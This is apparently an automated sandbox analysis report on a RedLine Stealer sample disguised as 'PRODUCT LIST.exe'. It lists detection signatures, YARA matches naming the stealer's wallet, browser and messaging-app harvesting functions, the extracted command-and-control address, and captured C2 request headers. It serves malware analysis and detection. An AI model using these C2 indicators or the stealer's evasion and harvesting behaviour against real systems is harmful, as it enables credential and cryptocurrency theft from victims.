Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PRODUCT LIST.exe

Overview

General Information

Sample name:PRODUCT LIST.exe
Analysis ID:1561829
MD5:a9b805862ccee6848ce91ef51a31f71d
SHA1:4ca749b30f879945324811f5924996765aa7d2e4
SHA256:9bdef064f9693bbae4a073b09a795c7b27e7486c10b3c7d920019ca3729bb434
Tags:exegeorouuser-NDA0E
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected RedLine Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to harvest and steal browser information (history, passwords, etc)
Uses known network protocols on non-standard ports
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • PRODUCT LIST.exe (PID: 5032 cmdline: "C:\Users\user\Desktop\PRODUCT LIST.exe" MD5: A9B805862CCEE6848CE91EF51A31F71D)
    • conhost.exe (PID: 5728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["104.219.234.170:16383"], "Bot Id": "Ammy"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2197202153.00000000001F2000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000002.2197202153.00000000001F2000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        00000000.00000002.2197202153.00000000001F2000.00000020.00000001.01000000.00000003.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
        • 0x133ca:$a4: get_ScannedWallets
        • 0x12228:$a5: get_ScanTelegram
        • 0x1304e:$a6: get_ScanGeckoBrowsersPaths
        • 0x10e6a:$a7: <Processes>k__BackingField
        • 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
        • 0x1079e:$a9: <ScanFTP>k__BackingField
        Process Memory Space: PRODUCT LIST.exe PID: 5032JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: PRODUCT LIST.exe PID: 5032JoeSecurity_RedLineYara detected RedLine StealerJoe Security
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.PRODUCT LIST.exe.1f0000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0.2.PRODUCT LIST.exe.1f0000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                0.2.PRODUCT LIST.exe.1f0000.0.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
                • 0x137ca:$a4: get_ScannedWallets
                • 0x12628:$a5: get_ScanTelegram
                • 0x1344e:$a6: get_ScanGeckoBrowsersPaths
                • 0x1126a:$a7: <Processes>k__BackingField
                • 0xf17c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
                • 0x10b9e:$a9: <ScanFTP>k__BackingField
                0.2.PRODUCT LIST.exe.1f0000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                • 0x1068a:$u7: RunPE
                • 0x13d41:$u8: DownloadAndEx
                • 0x9330:$pat14: , CommandLine:
                • 0x13279:$v2_1: ListOfProcesses
                • 0x1088b:$v2_2: get_ScanVPN
                • 0x1092e:$v2_2: get_ScanFTP
                • 0x1161e:$v2_2: get_ScanDiscord
                • 0x1260c:$v2_2: get_ScanSteam
                • 0x12628:$v2_2: get_ScanTelegram
                • 0x126ce:$v2_2: get_ScanScreen
                • 0x13416:$v2_2: get_ScanChromeBrowsersPaths
                • 0x1344e:$v2_2: get_ScanGeckoBrowsersPaths
                • 0x13709:$v2_2: get_ScanBrowsers
                • 0x137ca:$v2_2: get_ScannedWallets
                • 0x137f0:$v2_2: get_ScanWallets
                • 0x13810:$v2_3: GetArguments
                • 0x11ed9:$v2_4: VerifyUpdate
                • 0x167ee:$v2_4: VerifyUpdate
                • 0x13bca:$v2_5: VerifyScanRequest
                • 0x132c6:$v2_6: GetUpdates
                • 0x167cf:$v2_6: GetUpdates

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-24T11:49:11.146262+010020450001Malware Command and Control Activity Detected104.219.234.17016383192.168.2.549704TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-24T11:49:06.021573+010028496621Malware Command and Control Activity Detected192.168.2.549704104.219.234.17016383TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-24T11:49:11.719835+010028493511Malware Command and Control Activity Detected192.168.2.549704104.219.234.17016383TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-24T11:49:19.018903+010028482001Malware Command and Control Activity Detected192.168.2.549707104.219.234.17016383TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-24T11:49:17.537122+010028493521Malware Command and Control Activity Detected192.168.2.549706104.219.234.17016383TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: PRODUCT LIST.exeAvira: detected
                Found malware configuration
                Source: 0.2.PRODUCT LIST.exe.1f0000.0.unpackMalware Configuration Extractor: RedLine {"C2 url": ["104.219.234.170:16383"], "Bot Id": "Ammy"}
                Multi AV Scanner detection for submitted file
                Source: PRODUCT LIST.exeReversingLabs: Detection: 55%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: PRODUCT LIST.exeJoe Sandbox ML: detected
                Source: PRODUCT LIST.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: PRODUCT LIST.exe, 00000000.00000002.2197239004.0000000000216000.00000040.00000001.01000000.00000003.sdmp

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.5:49707 -> 104.219.234.170:16383
                Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.5:49704 -> 104.219.234.170:16383
                Source: Network trafficSuricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 104.219.234.170:16383 -> 192.168.2.5:49704
                Source: Network trafficSuricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.5:49704 -> 104.219.234.170:16383
                Source: Network trafficSuricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.5:49706 -> 104.219.234.170:16383
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: 104.219.234.170:16383
                Uses known network protocols on non-standard ports
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 16383
                Source: unknownNetwork traffic detected: HTTP traffic on port 16383 -> 49704
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 16383
                Source: unknownNetwork traffic detected: HTTP traffic on port 16383 -> 49704
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 16383
                Source: unknownNetwork traffic detected: HTTP traffic on port 16383 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 16383
                Source: unknownNetwork traffic detected: HTTP traffic on port 16383 -> 49707
                Source: global trafficTCP traffic: 192.168.2.5:49704 -> 104.219.234.170:16383
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 104.219.234.170:16383Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 104.219.234.170:16383Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 104.219.234.170:16383Content-Length: 20789Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 104.219.234.170:16383Content-Length: 20781Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                Source: Joe Sandbox ViewASN Name: DATAWAGONUS DATAWAGONUS
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.234.170
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: api.ip.sb
                Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 104.219.234.170:16383Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000032FE000.00000004.00000800.00020000.00000000.sdmp, PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmp, PRODUCT LIST.exe, 00000000.00000002.2199369265.000000000344C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.219.234.170:16383
                Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.219.234.170:16383/
                Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.000000000344C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.219.234.170:16383t-
                Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003433000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000030DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
                Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000030DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.000000000344C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000032FE000.00000004.00000800.00020000.00000000.sdmp, PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmp, PRODUCT LIST.exe, 00000000.00000002.2199369265.000000000344C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                Source: tmpBC2E.tmp.0.dr, tmp2E2C.tmp.0.dr, tmpF573.tmp.0.dr, tmp2E2B.tmp.0.dr, tmpF594.tmp.0.dr, tmpF553.tmp.0.dr, tmpBC0E.tmp.0.dr, tmp2E0B.tmp.0.dr, tmpBC70.tmp.0.dr, tmpBC3F.tmp.0.dr, tmpF5A4.tmp.0.dr, tmpBC4F.tmp.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000030B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb
                Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000030B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip
                Source: PRODUCT LIST.exeString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE
                Source: PRODUCT LIST.exe, PRODUCT LIST.exe, 00000000.00000002.2197202153.00000000001F2000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                Source: PRODUCT LIST.exeString found in binary or memory: https://api.ipify.orgcoo
                Source: PRODUCT LIST.exeString found in binary or memory: https://api.ipify.orgcookies//setti
                Source: PRODUCT LIST.exe, PRODUCT LIST.exe, 00000000.00000002.2197202153.00000000001F2000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                Source: tmpBC2E.tmp.0.dr, tmp2E2C.tmp.0.dr, tmpF573.tmp.0.dr, tmp2E2B.tmp.0.dr, tmpF594.tmp.0.dr, tmpF553.tmp.0.dr, tmpBC0E.tmp.0.dr, tmp2E0B.tmp.0.dr, tmpBC70.tmp.0.dr, tmpBC3F.tmp.0.dr, tmpF5A4.tmp.0.dr, tmpBC4F.tmp.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: tmpBC2E.tmp.0.dr, tmp2E2C.tmp.0.dr, tmpF573.tmp.0.dr, tmp2E2B.tmp.0.dr, tmpF594.tmp.0.dr, tmpF553.tmp.0.dr, tmpBC0E.tmp.0.dr, tmp2E0B.tmp.0.dr, tmpBC70.tmp.0.dr, tmpBC3F.tmp.0.dr, tmpF5A4.tmp.0.dr, tmpBC4F.tmp.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: tmpBC2E.tmp.0.dr, tmp2E2C.tmp.0.dr, tmpF573.tmp.0.dr, tmp2E2B.tmp.0.dr, tmpF594.tmp.0.dr, tmpF553.tmp.0.dr, tmpBC0E.tmp.0.dr, tmp2E0B.tmp.0.dr, tmpBC70.tmp.0.dr, tmpBC3F.tmp.0.dr, tmpF5A4.tmp.0.dr, tmpBC4F.tmp.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: tmpBC2E.tmp.0.dr, tmp2E2C.tmp.0.dr, tmpF573.tmp.0.dr, tmp2E2B.tmp.0.dr, tmpF594.tmp.0.dr, tmpF553.tmp.0.dr, tmpBC0E.tmp.0.dr, tmp2E0B.tmp.0.dr, tmpBC70.tmp.0.dr, tmpBC3F.tmp.0.dr, tmpF5A4.tmp.0.dr, tmpBC4F.tmp.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: tmpBC2E.tmp.0.dr, tmp2E2C.tmp.0.dr, tmpF573.tmp.0.dr, tmp2E2B.tmp.0.dr, tmpF594.tmp.0.dr, tmpF553.tmp.0.dr, tmpBC0E.tmp.0.dr, tmp2E0B.tmp.0.dr, tmpBC70.tmp.0.dr, tmpBC3F.tmp.0.dr, tmpF5A4.tmp.0.dr, tmpBC4F.tmp.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: tmpBC2E.tmp.0.dr, tmp2E2C.tmp.0.dr, tmpF573.tmp.0.dr, tmp2E2B.tmp.0.dr, tmpF594.tmp.0.dr, tmpF553.tmp.0.dr, tmpBC0E.tmp.0.dr, tmp2E0B.tmp.0.dr, tmpBC70.tmp.0.dr, tmpBC3F.tmp.0.dr, tmpF5A4.tmp.0.dr, tmpBC4F.tmp.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: PRODUCT LIST.exe, PRODUCT LIST.exe, 00000000.00000002.2197202153.00000000001F2000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                Source: tmpBC2E.tmp.0.dr, tmp2E2C.tmp.0.dr, tmpF573.tmp.0.dr, tmp2E2B.tmp.0.dr, tmpF594.tmp.0.dr, tmpF553.tmp.0.dr, tmpBC0E.tmp.0.dr, tmp2E0B.tmp.0.dr, tmpBC70.tmp.0.dr, tmpBC3F.tmp.0.dr, tmpF5A4.tmp.0.dr, tmpBC4F.tmp.0.drString found in binary or memory: https://www.ecosia.org/newtab/
                Source: tmpBC2E.tmp.0.dr, tmp2E2C.tmp.0.dr, tmpF573.tmp.0.dr, tmp2E2B.tmp.0.dr, tmpF594.tmp.0.dr, tmpF553.tmp.0.dr, tmpBC0E.tmp.0.dr, tmp2E0B.tmp.0.dr, tmpBC70.tmp.0.dr, tmpBC3F.tmp.0.dr, tmpF5A4.tmp.0.dr, tmpBC4F.tmp.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 0.2.PRODUCT LIST.exe.1f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                Source: 0.2.PRODUCT LIST.exe.1f0000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                Source: 00000000.00000002.2197202153.00000000001F2000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                Source: Process Memory Space: PRODUCT LIST.exe PID: 5032, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                PE file contains section with special chars
                Source: PRODUCT LIST.exeStatic PE information: section name:
                Source: PRODUCT LIST.exeStatic PE information: section name:
                Source: PRODUCT LIST.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeCode function: 0_2_0100E7B00_2_0100E7B0
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeCode function: 0_2_0100DC900_2_0100DC90
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeCode function: 0_2_064D96D00_2_064D96D0
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeCode function: 0_2_064D45080_2_064D4508
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeCode function: 0_2_064DD5C80_2_064DD5C8
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeCode function: 0_2_064D33C00_2_064D33C0
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeCode function: 0_2_064DDAD00_2_064DDAD0
                Source: C:\Users\user\Desktop\PRODUCT LIST.exeCode function: 0_2_064D12100_2_064D1210
                Source: PRODUCT LIST.exeBinary or memory string: OriginalFilename vs PRODUCT LIST.exe
                Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000032B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefirefox.exe0 vs PRODUCT LIST.exe
                Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000032B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs PRODUCT LIST.exe
                Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000032B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ${q,\\StringFileInfo\\000004B0\\OriginalFilename vs PRODUCT LIST.exe
                Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000032B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamechrome.exe< vs PRODUCT LIST.exe
                Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000032B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ${q,\\StringFileInfo\\040904B0\\OriginalFilename vs PRODUCT LIST.exe
                Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000032B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIEXPLORE.EXE.MUID vs PRODUCT LIST.exe
                Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000032B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIEXPLORE.EXED vs PRODUCT LIST.exe
                Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000032B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ${q,\\StringFileInfo\\080904B0\\OriginalFilename vs PRODUCT LIST.exe
                Source: PRODUCT LIST.exe, 00000000.00000002.2199369265.00000000032B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs PRODUCT LIST.exe
                Source: PRODUCT LIST.exe, 00000000.00000002.2198304415.0000000000E5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PRODUCT LIST.exe
                Source: PRODUCT LIST.exe, 00000000.00000000.2034884508.0000000000214000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs PRODUCT LIST.exe
                Source: PRODUCT LIST.exe, 00000000.00000002.2197202153.00000000001F2000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs PRODUCT LIST.exe
                Source: PRODUCT LIST.exeBinary or memory string: OriginalFilenameImplosions.exe4 vs PRODUCT LIST.exe
                Source: PRODUCT LIST.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.PRODUCT LIST.exe.1f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                Source: 0.2.PRODUCT LIST.exe.1f0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
